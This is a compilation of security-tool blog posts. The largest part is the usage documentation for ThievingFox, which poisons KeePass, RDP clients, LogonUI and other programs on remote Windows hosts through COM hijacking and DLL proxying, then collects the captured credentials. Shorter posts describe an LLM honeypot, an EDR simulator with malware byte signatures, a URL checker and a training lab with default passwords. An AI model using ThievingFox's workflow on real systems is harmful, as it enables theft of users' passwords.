For each application specified in the command line parameters, the poison module retrieves the original library that is going to be hijacked (for COM hijacking and DLL proxying), compiles a library that matches the properties of the original DLL, uploads it to the remote host, and modifies the registry if needed to perform COM hijacking.

    To speed up the process of compilation of all libraries, a cache is maintained in client/cache/.

--mstsc, --rdcman, and --mobaxterm have a specific option, respectively --mstsc-poison-hkcr, --rdcman-poison-hkcr, and --mobaxterm-poison-hkcr. If one of these options is specified, the COM hijacking will replace the registry key in the HKCR hive, meaning all users will be impacted. By default, only currently logged-in users are impacted (all users that have an HKCU hive).

    --keepass and --keepassxc have specific options, --keepass-path, --keepass-share, and --keepassxc-path, --keepassxc-share, to specify where these applications are installed, if it's not the default installation path. This is not required for other applications, since COM hijacking is used.

The KeePass module requires the Visual C++ Redistributable to be installed on the target.

    Multiple applications can be specified at once, or, the --all flag can be used to target all applications.

    [!IMPORTANT] Remember to clean the cache if you ever change the --tempdir parameter, since the directory name is embedded inside native DLLs.

    $ python3 client/ThievingFox.py poison -h
    usage: ThievingFox.py poison [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-path KEEPASS_PATH]
    [--keepass-share KEEPASS_SHARE] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--mstsc-poison-hkcr]
    [--consent] [--logonui] [--rdcman] [--rdcman-poison-hkcr] [--mobaxterm] [--mobaxterm-poison-hkcr] [--all]
    target

    positional arguments:
    target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

    options:
    -h, --help show this help message and exit
    -hashes HASHES, --hashes HASHES
    LM:NT hash
    -aesKey AESKEY, --aesKey AESKEY
    AES key to use for Kerberos Authentication
    -k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
    -dc-ip DC_IP, --dc-ip DC_IP
    IP Address of the domain controller
    -no-pass, --no-pass Do not prompt for password
    --tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
    --keepass Try to poison KeePass.exe
    --keepass-path KEEPASS_PATH
    The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
    --keepass-share KEEPASS_SHARE
    The share on which KeePass is installed (Default: c$)
    --keepassxc Try to poison KeePassXC.exe
    --keepassxc-path KEEPASSXC_PATH
    The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
--keepassxc-share KEEPASSXC_SHARE
    The share on which KeePassXC is installed (Default: c$)
    --mstsc Try to poison mstsc.exe
    --mstsc-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for mstsc, which will also work for user that are currently not
    logged in (Default: False)
    --consent Try to poison Consent.exe
    --logonui Try to poison LogonUI.exe
    --rdcman Try to poison RDCMan.exe
    --rdcman-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for RDCMan, which will also work for user that are currently not
    logged in (Default: False)
    --mobaxterm Try to poison MobaXTerm.exe
    --mobaxterm-poison-hkcr
    Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for MobaXTerm, which will also work for user that are currently not
    logged in (Default: False)
    --all Try to poison all applications

    Cleanup

For each application specified in the command line parameters, the cleanup module first removes poisoning artifacts that force the target application to load the hooking library. Then, it tries to delete the libraries that were uploaded to the remote host.

For applications that support poisoning of both the HKCU and HKCR hives, both are cleaned up regardless.

    Multiple applications can be specified at once, or, the --all flag can be used to cleanup all applications.

    It does not clean extracted credentials on the remote host.

[!IMPORTANT] If the targeted application is in use while the cleanup module is run, the DLLs dropped on the target cannot be deleted. Nonetheless, the cleanup module will revert the configuration that enables the injection, which should ensure that the next time the application is launched, no injection is performed. Files that cannot be deleted by ThievingFox are logged.

    $ python3 client/ThievingFox.py cleanup -h
    usage: ThievingFox.py cleanup [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-share KEEPASS_SHARE]
    [--keepass-path KEEPASS_PATH] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--consent] [--logonui]
    [--rdcman] [--mobaxterm] [--all]
    target

    positional arguments:
    target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

    options:
    -h, --help show this help message and exit
    -hashes HASHES, --hashes HASHES
    LM:NT hash
    -aesKey AESKEY, --aesKey AESKEY
    AES key to use for Kerberos Authentication
-k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
    -dc-ip DC_IP, --dc-ip DC_IP
    IP Address of the domain controller
    -no-pass, --no-pass Do not prompt for password
    --tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
    --keepass Try to cleanup all poisonning artifacts related to KeePass.exe
    --keepass-share KEEPASS_SHARE
    The share on which KeePass is installed (Default: c$)
    --keepass-path KEEPASS_PATH
    The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
    --keepassxc Try to cleanup all poisonning artifacts related to KeePassXC.exe
    --keepassxc-path KEEPASSXC_PATH
    The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
    --keepassxc-share KEEPASSXC_SHARE
    The share on which KeePassXC is installed (Default: c$)
    --mstsc Try to cleanup all poisonning artifacts related to mstsc.exe
    --consent Try to cleanup all poisonning artifacts related to Consent.exe
    --logonui Try to cleanup all poisonning artifacts related to LogonUI.exe
    --rdcman Try to cleanup all poisonning artifacts related to RDCMan.exe
    --mobaxterm Try to cleanup all poisonning artifacts related to MobaXTerm.exe
    --all Try to cleanup all poisonning artifacts related to all applications

    Collect

For each application specified in the command line parameters, the collect module retrieves the corresponding output files stored on the remote host inside C:\Windows\Temp\<tempdir>, and decrypts them. The files are then deleted from the remote host, and the retrieved data is stored in client/output/.

    Multiple applications can be specified at once, or, the --all flag can be used to collect logs from all applications.

    $ python3 client/ThievingFox.py collect -h
    usage: ThievingFox.py collect [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepassxc] [--mstsc] [--consent]
    [--logonui] [--rdcman] [--mobaxterm] [--all]
    target

    positional arguments:
    target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

    options:
    -h, --help show this help message and exit
    -hashes HASHES, --hashes HASHES
    LM:NT hash
    -aesKey AESKEY, --aesKey AESKEY
    AES key to use for Kerberos Authentication
    -k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
    -dc-ip DC_IP, --dc-ip DC_IP
IP Address of the domain controller
    -no-pass, --no-pass Do not prompt for password
    --tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
    --keepass Collect KeePass.exe logs
    --keepassxc Collect KeePassXC.exe logs
    --mstsc Collect mstsc.exe logs
    --consent Collect Consent.exe logs
    --logonui Collect LogonUI.exe logs
    --rdcman Collect RDCMan.exe logs
    --mobaxterm Collect MobaXTerm.exe logs
    --all Collect logs from all applications



    Galah - An LLM-powered Web Honeypot Using The OpenAI API

    By: Zion3R β€” April 29th 2024 at 12:30


    TL;DR: Galah (/Ι‘Ι™Λˆlɑː/ - pronounced 'guh-laa') is an LLM (Large Language Model) powered web honeypot, currently compatible with the OpenAI API, that is able to mimic various applications and dynamically respond to arbitrary HTTP requests.


    Description

    Named after the clever Australian parrot known for its mimicry, Galah mirrors this trait in its functionality. Unlike traditional web honeypots that rely on a manual and limiting method of emulating numerous web applications or vulnerabilities, Galah adopts a novel approach. This LLM-powered honeypot mimics various web applications by dynamically crafting relevant (and occasionally foolish) responses, including HTTP headers and body content, to arbitrary HTTP requests. Fun fact: in Aussie English, Galah also means fool!

    I've deployed a cache for the LLM-generated responses (the cache duration can be customized in the config file) to avoid generating multiple responses for the same request and to reduce the cost of the OpenAI API. The cache stores responses per port, meaning if you probe a specific port of the honeypot, the generated response won't be returned for the same request on a different port.
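The per-port cache behaviour described above can be sketched in a few lines: entries are keyed by (port, request), so an identical request on a different port is a cache miss. Galah itself is written in Go; this Python toy (key shape and TTL handling are assumptions) just demonstrates the idea:

```python
import time

class ResponseCache:
    # Caches LLM-generated responses per (port, request) pair with a TTL,
    # so repeated identical probes don't trigger new API calls.
    def __init__(self, ttl_seconds=3600):
        self.ttl = ttl_seconds
        self.entries = {}  # (port, request) -> (timestamp, response)

    def get(self, port, request):
        hit = self.entries.get((port, request))
        if hit is None:
            return None
        ts, response = hit
        if time.time() - ts > self.ttl:   # expired entry: evict and miss
            del self.entries[(port, request)]
            return None
        return response

    def put(self, port, request, response):
        self.entries[(port, request)] = (time.time(), response)
```

Keying on the port matters for a honeypot: the same path probed on two ports may be mimicking two different applications, so a shared response would be a fingerprinting giveaway.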

    The prompt is the most crucial part of this honeypot! You can update the prompt in the config file, but be sure not to change the part that instructs the LLM to generate the response in the specified JSON format.

    Note: Galah was a fun weekend project I created to evaluate the capabilities of LLMs in generating HTTP messages, and it is not intended for production use. The honeypot may be fingerprinted based on its response time, non-standard, or sometimes weird responses, and other network-based techniques. Use this tool at your own risk, and be sure to set usage limits for your OpenAI API.

    Future Enhancements

    • Rule-Based Response: The new version of Galah will employ a dynamic, rule-based approach, adding more control over response generation. This will further reduce OpenAI API costs and increase the accuracy of the generated responses.

    • Response Database: It will enable you to generate and import a response database. This ensures the honeypot only turns to the OpenAI API for unknown or new requests. I'm also working on cleaning up and sharing my own database.

    • Support for Other LLMs.

    Getting Started

    • Ensure you have Go version 1.20+ installed.
    • Create an OpenAI API key from here.
    • If you want to serve over HTTPS, generate TLS certificates.
    • Clone the repo and install the dependencies.
    • Update the config.yaml file.
    • Build and run the Go binary!
    % git clone git@github.com:0x4D31/galah.git
    % cd galah
    % go mod download
    % go build
    % ./galah -i en0 -v

    β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ
    β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ
    β–ˆβ–ˆ β–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ
    β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ
    β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ
    llm-based web honeypot // version 1.0
    author: Adel "0x4D31" Karimi

    2024/01/01 04:29:10 Starting HTTP server on port 8080
    2024/01/01 04:29:10 Starting HTTP server on port 8888
    2024/01/01 04:29:10 Starting HTTPS server on port 8443 with TLS profile: profile1_selfsigned
    2024/01/01 04:29:10 Starting HTTPS server on port 443 with TLS profile: profile1_selfsigned

    2024/01/01 04:35:57 Received a request for "/.git/config" from [::1]:65434
    2024/01/01 04:35:57 Request cache miss for "/.git/config": Not found in cache
    2024/01/01 04:35:59 Generated HTTP response: {"Headers": {"Content-Type": "text/plain", "Server": "Apache/2.4.41 (Ubuntu)", "Status": "403 Forbidden"}, "Body": "Forbidden\nYou don't have permission to access this resource."}
    2024/01/01 04:35:59 Sending the crafted response to [::1]:65434

    ^C2024/01/01 04:39:27 Received shutdown signal. Shutting down servers...
    2024/01/01 04:39:27 All servers shut down gracefully.

    Example Responses

    Here are some example responses:

    Example 1

    % curl http://localhost:8080/login.php
    <!DOCTYPE html><html><head><title>Login Page</title></head><body><form action='/submit.php' method='post'><label for='uname'><b>Username:</b></label><br><input type='text' placeholder='Enter Username' name='uname' required><br><label for='psw'><b>Password:</b></label><br><input type='password' placeholder='Enter Password' name='psw' required><br><button type='submit'>Login</button></form></body></html>

    JSON log record:

    {"timestamp":"2024-01-01T05:38:08.854878","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"51978","sensorName":"home-sensor","port":"8080","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/login.php","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Content-Type":"text/html","Server":"Apache/2.4.38"},"body":"\u003c!DOCTYPE html\u003e\u003chtml\u003e\u003chead\u003e\u003ctitle\u003eLogin Page\u003c/title\u003e\u003c/head\u003e\u003cbody\u003e\u003cform action='/submit.php' method='post'\u003e\u003clabel for='uname'\u003e\u003cb\u003eUsername:\u003c/b\u003e\u003c/label\u003e\u003cbr\u003e\u003cinput type='text' placeholder='Enter Username' name='uname' required\u003e\u003cbr\u003e\u003clabel for='psw'\u003e\u003cb\u003ePassword:\u003c/b\u003e\u003c/label\u003e\u003cbr\u003e\u003cinput type='password' placeholder='Enter Password' name='psw' required\u003e\u003cbr\u003e\u003cbutton type='submit'\u003eLogin\u003c/button\u003e\u003c/form\u003e\u003c/body\u003e\u003c/html\u003e"}}
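Records like the one above are plain JSON, so summarising a log file takes only a few lines of Python; the field names below follow the sample records shown in this article:

```python
import json

def summarize(record_line):
    # Condense one Galah JSON log record into a single summary line:
    # source address, method, requested path, and the honeypot port hit.
    r = json.loads(record_line)
    req = r["httpRequest"]
    return (f'{r["srcIP"]}:{r["srcPort"]} {req["method"]} '
            f'{req["request"]} (honeypot port {r["port"]})')
```

Fed line-by-line over a log file, this gives a quick view of which paths and ports attackers are probing.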

    Example 2

    % curl http://localhost:8080/.aws/credentials
    [default]
    aws_access_key_id = AKIAIOSFODNN7EXAMPLE
    aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
    region = us-west-2

    JSON log record:

    {"timestamp":"2024-01-01T05:40:34.167361","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"65311","sensorName":"home-sensor","port":"8080","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/.aws/credentials","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Encoding":"gzip","Content-Length":"126","Content-Type":"text/plain","Server":"Apache/2.4.51 (Unix)"},"body":"[default]\naws_access_key_id = AKIAIOSFODNN7EXAMPLE\naws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\nregion = us-west-2"}}

    Okay, that was impressive!

    Example 3

    Now, let's do some sort of adversarial testing!

    % curl http://localhost:8888/are-you-a-honeypot
No, I am a server.

    JSON log record:

    {"timestamp":"2024-01-01T05:50:43.792479","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"61982","sensorName":"home-sensor","port":"8888","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/are-you-a-honeypot","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Length":"20","Content-Type":"text/plain","Server":"Apache/2.4.41 (Ubuntu)"},"body":"No, I am a server."}}

    πŸ˜‘

    % curl http://localhost:8888/i-mean-are-you-a-fake-server
    No, I am not a fake server.

    JSON log record:

    {"timestamp":"2024-01-01T05:51:40.812831","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"62205","sensorName":"home-sensor","port":"8888","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/i-mean-are-you-a-fake-server","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Type":"text/plain","Server":"LocalHost/1.0"},"body":"No, I am not a fake server."}}

    You're a galah, mate!
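One detail worth sanity-checking in logs like these: the `bodySha256` field is just the SHA-256 of the request body, and every GET above has an empty body, so the value is the well-known empty-string digest. A quick check (the abbreviated record below is trimmed from the logs above, not a full honeypot record):

```python
import hashlib
import json

# One of the honeypot's JSON log records, abbreviated to the fields we need.
record = json.loads(
    '{"httpRequest": {"body": "", '
    '"bodySha256": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"}}'
)

body = record["httpRequest"]["body"].encode()
digest = hashlib.sha256(body).hexdigest()

# An empty body always hashes to the well-known empty-string SHA-256.
assert digest == record["httpRequest"]["bodySha256"]
```

The same trick is handy when hunting for identical payloads across many records: matching `bodySha256` values mean byte-identical bodies without comparing the bodies themselves.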



    KitPloit - PenTest Tools!

    CrimsonEDR - Simulate The Behavior Of AV/EDR For Malware Development Training

    By: Zion3R β€” April 28th 2024 at 12:30


    CrimsonEDR is an open-source project engineered to identify specific malware patterns, offering a tool for honing skills in circumventing Endpoint Detection and Response (EDR). By leveraging diverse detection methods, it empowers users to deepen their understanding of security evasion tactics.


    Features

    β€’ Direct Syscall: Detects the usage of direct system calls, often employed by malware to bypass traditional API hooks.
    β€’ NTDLL Unhooking: Identifies attempts to unhook functions within the NTDLL library, a common evasion technique.
    β€’ AMSI Patch: Detects modifications to the Anti-Malware Scan Interface (AMSI) through byte-level analysis.
    β€’ ETW Patch: Detects byte-level alterations to Event Tracing for Windows (ETW), commonly manipulated by malware to evade detection.
    β€’ PE Stomping: Identifies instances of PE (Portable Executable) stomping.
    β€’ Reflective PE Loading: Detects the reflective loading of PE files, a technique employed by malware to avoid static analysis.
    β€’ Unbacked Thread Origin: Identifies threads originating from unbacked memory regions, often indicative of malicious activity.
    β€’ Unbacked Thread Start Address: Detects threads with start addresses pointing to unbacked memory, a potential sign of code injection.
    β€’ API Hooking: Places a hook on the NtWriteVirtualMemory function to monitor memory modifications.
    β€’ Custom Pattern Search: Allows users to search for specific patterns provided in a JSON file, facilitating the identification of known malware signatures.

    Installation

    To get started with CrimsonEDR, follow these steps:

    1. Install the dependency: sudo apt-get install gcc-mingw-w64-x86-64
    2. Clone the repository: git clone https://github.com/Helixo32/CrimsonEDR
    3. Compile the project: cd CrimsonEDR; chmod +x compile.sh; ./compile.sh

    ⚠️ Warning

    Windows Defender and other antivirus programs may flag the DLL as malicious due to its content containing bytes used to verify if the AMSI has been patched. Please ensure to whitelist the DLL or disable your antivirus temporarily when using CrimsonEDR to avoid any interruptions.

    Usage

    To use CrimsonEDR, follow these steps:

    1. Make sure the ioc.json file is placed in the current directory from which the executable being monitored is launched. For example, if you launch your executable to monitor from C:\Users\admin\, the DLL will look for ioc.json in C:\Users\admin\ioc.json. Currently, ioc.json contains patterns related to msfvenom. You can easily add your own in the following format:
    {
      "IOC": [
        ["0x03", "0x4c", "0x24", "0x08", "0x45", "0x39", "0xd1", "0x75"],
        ["0xf1", "0x4c", "0x03", "0x4c", "0x24", "0x08", "0x45", "0x39"],
        ["0x58", "0x44", "0x8b", "0x40", "0x24", "0x49", "0x01", "0xd0"],
        ["0x66", "0x41", "0x8b", "0x0c", "0x48", "0x44", "0x8b", "0x40"],
        ["0x8b", "0x0c", "0x48", "0x44", "0x8b", "0x40", "0x1c", "0x49"],
        ["0x01", "0xc1", "0x38", "0xe0", "0x75", "0xf1", "0x4c", "0x03"],
        ["0x24", "0x49", "0x01", "0xd0", "0x66", "0x41", "0x8b", "0x0c"],
        ["0xe8", "0xcc", "0x00", "0x00", "0x00", "0x41", "0x51", "0x41"]
      ]
    }
    2. Execute CrimsonEDRPanel.exe with the following arguments:

      • -d <path_to_dll>: Specifies the path to the CrimsonEDR.dll file.

      • -p <process_id>: Specifies the Process ID (PID) of the target process where you want to inject the DLL.

    For example:

    .\CrimsonEDRPanel.exe -d C:\Temp\CrimsonEDR.dll -p 1234
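At its core, the custom pattern search is a byte-substring scan of memory against the IOC entries. A minimal user-mode sketch of the same idea in Python (the `scan` helper and sample buffer are illustrative, not CrimsonEDR's actual code, which performs this from an injected DLL):

```python
import json

# Patterns in the ioc.json format shown above: lists of hex-byte strings.
ioc_json = '{"IOC": [["0xe8", "0xcc", "0x00", "0x00", "0x00", "0x41", "0x51", "0x41"]]}'

patterns = [bytes(int(b, 16) for b in pat) for pat in json.loads(ioc_json)["IOC"]]

def scan(buffer: bytes) -> list:
    """Return (offset, pattern) for every IOC pattern found in the buffer."""
    hits = []
    for pat in patterns:
        off = buffer.find(pat)
        while off != -1:
            hits.append((off, pat))
            off = buffer.find(pat, off + 1)
    return hits

# A buffer containing one msfvenom-style stub surrounded by padding.
sample = b"\x90\x90" + bytes([0xe8, 0xcc, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41]) + b"\x90"
assert scan(sample)[0][0] == 2  # stub found at offset 2
```

The real EDR-side work is walking the target process's memory regions before scanning; the matching step itself is this simple.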

    Useful Links

    Here are some useful resources that helped in the development of this project:

    Contact

    For questions, feedback, or support, please reach out to me via:



    KitPloit - PenTest Tools!

    Url-Status-Checker - Tool For Swiftly Checking The Status Of URLs

    By: Zion3R β€” April 27th 2024 at 16:55



    Status Checker is a Python script that checks the status of one or multiple URLs/domains and categorizes them based on their HTTP status codes. Version 1.0.0. Created by BLACK-SCORP10 (t.me/BLACK-SCORP10).

    Features

    • Check the status of single or multiple URLs/domains.
    • Asynchronous HTTP requests for improved performance.
    • Color-coded output for better visualization of status codes.
    • Progress bar when checking multiple URLs.
    • Save results to an output file.
    • Error handling for inaccessible URLs and invalid responses.
    • Command-line interface for easy usage.

    Installation

    1. Clone the repository:

    git clone https://github.com/your_username/status-checker.git
    cd status-checker

    1. Install dependencies:

    pip install -r requirements.txt

    Usage

    python status_checker.py [-h] [-d DOMAIN] [-l LIST] [-o OUTPUT] [-v] [-update]
    • -d, --domain: Single domain/URL to check.
    • -l, --list: File containing a list of domains/URLs to check.
    • -o, --output: File to save the output.
    • -v, --version: Display version information.
    • -update: Update the tool.

    Example:

    python status_checker.py -l urls.txt -o results.txt
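The core of a tool like this is mapping each response code into a display bucket while fanning the requests out concurrently. A rough stdlib-only sketch of both pieces (the bucket names and ranges follow standard HTTP status classes and are my reading, not Status Checker's exact code):

```python
import asyncio
import urllib.error
import urllib.request

def categorize(status: int) -> str:
    """Bucket an HTTP status code the way a color-coded report would."""
    if 200 <= status < 300:
        return "SUCCESS"
    if 300 <= status < 400:
        return "REDIRECT"
    if 400 <= status < 500:
        return "CLIENT ERROR"
    if 500 <= status < 600:
        return "SERVER ERROR"
    return "UNKNOWN"

async def check(url: str) -> tuple:
    """Fetch one URL in a worker thread so many checks can run concurrently."""
    def fetch():
        try:
            with urllib.request.urlopen(url, timeout=5) as resp:
                return resp.status
        except urllib.error.HTTPError as e:
            return e.code          # 4xx/5xx still carry a status code
        except OSError:
            return 0               # unreachable host / DNS failure
    status = await asyncio.to_thread(fetch)
    return url, status, categorize(status)

# asyncio.gather(*(check(u) for u in urls)) fans the checks out concurrently.
print(categorize(200), categorize(404))  # -> SUCCESS CLIENT ERROR
```

Third-party async HTTP libraries would be faster for large lists, but the thread-offload pattern above keeps the sketch dependency-free.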

    Preview:

    License

    This project is licensed under the MIT License - see the LICENSE file for details.



    KitPloit - PenTest Tools!

    CSAF - Cyber Security Awareness Framework

    By: Zion3R β€” April 26th 2024 at 12:30

    The Cyber Security Awareness Framework (CSAF) is a structured approach aimed at enhancing cybersecurity awareness and understanding among individuals, organizations, and communities. It provides guidance for the development of effective cybersecurity awareness programs, covering key areas such as assessing awareness needs, creating educational materials, conducting training and simulations, implementing communication campaigns, and measuring awareness levels. By adopting this framework, organizations can foster a robust security culture, enhance their ability to detect and respond to cyber threats, and mitigate the risks associated with attacks and security breaches.


    Requirements

    Software

    • Docker
    • Docker-compose

    Hardware

    Minimum

    • 4 Core CPU
    • 10GB RAM
    • 60GB Disk free

    Recommendation

    • 8 Core CPU or above
    • 16GB RAM or above
    • 100GB Disk free or above

    Installation

    Clone the repository

    git clone https://github.com/csalab-id/csaf.git

    Navigate to the project directory

    cd csaf

    Pull the Docker images

    docker-compose --profile=all pull

    Generate the Wazuh SSL certificates

    docker-compose -f generate-indexer-certs.yml run --rm generator

    For security reasons, you should first set the passwords via environment variables:

    export ATTACK_PASS=ChangeMePlease
    export DEFENSE_PASS=ChangeMePlease
    export MONITOR_PASS=ChangeMePlease
    export SPLUNK_PASS=ChangeMePlease
    export GOPHISH_PASS=ChangeMePlease
    export MAIL_PASS=ChangeMePlease
    export PURPLEOPS_PASS=ChangeMePlease

    Start all the containers

    docker-compose --profile=all up -d

    You can run specific labs by selecting one of the following profiles: all, attackdefenselab, phisinglab, breachlab, soclab.

    For example

    docker-compose --profile=attackdefenselab up -d

    Proof



    Exposed Ports

    An exposed port can be accessed using a SOCKS5 proxy client, an SSH client, or an HTTP client. Choose one for the best experience.

    • Port 6080 (Access to attack network)
    • Port 7080 (Access to defense network)
    • Port 8080 (Access to monitor network)

    Example usage

    Access internal network with proxy socks5

    • curl --proxy socks5://ipaddress:6080 http://10.0.0.100/vnc.html
    • curl --proxy socks5://ipaddress:7080 http://10.0.1.101/vnc.html
    • curl --proxy socks5://ipaddress:8080 http://10.0.3.102/vnc.html

    Remote ssh with ssh client

    • ssh kali@ipaddress -p 6080 (default password: attackpassword)
    • ssh kali@ipaddress -p 7080 (default password: defensepassword)
    • ssh kali@ipaddress -p 8080 (default password: monitorpassword)

    Access kali linux desktop with curl / browser

    • curl http://ipaddress:6080/vnc.html
    • curl http://ipaddress:7080/vnc.html
    • curl http://ipaddress:8080/vnc.html

    Domain Access

    • http://attack.lab/vnc.html (default password: attackpassword)
    • http://defense.lab/vnc.html (default password: defensepassword)
    • http://monitor.lab/vnc.html (default password: monitorpassword)
    • https://gophish.lab:3333/ (default username: admin, default password: gophishpassword)
    β€’ https://server.lab/ (default username: postmaster@server.lab, default password: mailpassword)
    β€’ https://server.lab/iredadmin/ (default username: postmaster@server.lab, default password: mailpassword)
    β€’ https://mail.server.lab/ (default username: postmaster@server.lab, default password: mailpassword)
    β€’ https://mail.server.lab/iredadmin/ (default username: postmaster@server.lab, default password: mailpassword)
    β€’ http://phising.lab/
    β€’ http://10.0.0.200:8081/
    β€’ http://gitea.lab/ (default username: csalab, default password: giteapassword)
    β€’ http://dvwa.lab/ (default username: admin, default password: password)
    β€’ http://dvwa-monitor.lab/ (default username: admin, default password: password)
    β€’ http://dvwa-modsecurity.lab/ (default username: admin, default password: password)
    β€’ http://wackopicko.lab/
    β€’ http://juiceshop.lab/
    β€’ https://wazuh-indexer.lab:9200/ (default username: admin, default password: SecretPassword)
    β€’ https://wazuh-manager.lab/
    β€’ https://wazuh-dashboard.lab:5601/ (default username: admin, default password: SecretPassword)
    • http://splunk.lab/ (default username: admin, default password: splunkpassword)
    • https://infectionmonkey.lab:5000/
    • http://purpleops.lab/ (default username: admin@purpleops.com, default password: purpleopspassword)
    • http://caldera.lab/ (default username: red/blue, default password: calderapassword)

    Network / IP Address

    Attack

    • 10.0.0.100 attack.lab
    • 10.0.0.200 phising.lab
    • 10.0.0.201 server.lab
    • 10.0.0.201 mail.server.lab
    • 10.0.0.202 gophish.lab
    • 10.0.0.110 infectionmonkey.lab
    • 10.0.0.111 mongodb.lab
    • 10.0.0.112 purpleops.lab
    • 10.0.0.113 caldera.lab

    Defense

    • 10.0.1.101 defense.lab
    • 10.0.1.10 dvwa.lab
    • 10.0.1.13 wackopicko.lab
    • 10.0.1.14 juiceshop.lab
    • 10.0.1.20 gitea.lab
    • 10.0.1.110 infectionmonkey.lab
    • 10.0.1.112 purpleops.lab
    • 10.0.1.113 caldera.lab

    Monitor

    • 10.0.3.201 server.lab
    • 10.0.3.201 mail.server.lab
    • 10.0.3.9 mariadb.lab
    • 10.0.3.10 dvwa.lab
    • 10.0.3.11 dvwa-monitor.lab
    • 10.0.3.12 dvwa-modsecurity.lab
    • 10.0.3.102 monitor.lab
    • 10.0.3.30 wazuh-manager.lab
    • 10.0.3.31 wazuh-indexer.lab
    • 10.0.3.32 wazuh-dashboard.lab
    • 10.0.3.40 splunk.lab

    Public

    • 10.0.2.101 defense.lab
    • 10.0.2.13 wackopicko.lab

    Internet

    • 10.0.4.102 monitor.lab
    • 10.0.4.30 wazuh-manager.lab
    • 10.0.4.32 wazuh-dashboard.lab
    • 10.0.4.40 splunk.lab

    Internal

    • 10.0.5.100 attack.lab
